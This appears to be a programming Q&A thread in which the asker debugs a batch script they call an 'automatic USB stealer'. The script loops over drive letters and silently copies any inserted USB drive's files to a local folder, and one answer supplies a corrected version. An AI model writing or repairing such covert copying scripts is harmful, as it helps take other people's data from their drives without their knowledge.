# What is wrong with my automatic USB stealer?

Tags: batch-file, xcopy

i made it to loop through the dives on my computer and when ever a usb is in the drive it copies it to a folder?
but when ever i run it, it doesn't work whats wrong?

```
@echo off
cls
:loop
xcopy /S E:\ D:\Users\nic\Desktop\Stuff\Usb >nul 
cls
xcopy /S F:\ D:\Users\nic\Desktop\Stuff\Usb >nul
cls
xcopy /S H:\ D:\Users\nic\Desktop\Stuff\Usb >nul
cls
xcopy /S I:\ D:\Users\nic\Usb 
timeout 10
goto loop
```

Comment: Nothing to do with Javascript - retagged and reformatted.

Answer (score 1):

Have you tried removing the `>nul` to see if you're hiding informative messages like it waiting for a drive to be inserted?

Answer (score 0):

Try this instead

```
@echo off
:loop
xcopy /E E:\ D:\Users\nic\Desktop\Stuff\Usb >nul 
xcopy /E F:\ D:\Users\nic\Desktop\Stuff\Usb >nul
xcopy /E H:\ D:\Users\nic\Desktop\Stuff\Usb >nul
xcopy /E I:\ D:\Users\nic\Usb 
timeout /t 10
goto :loop
```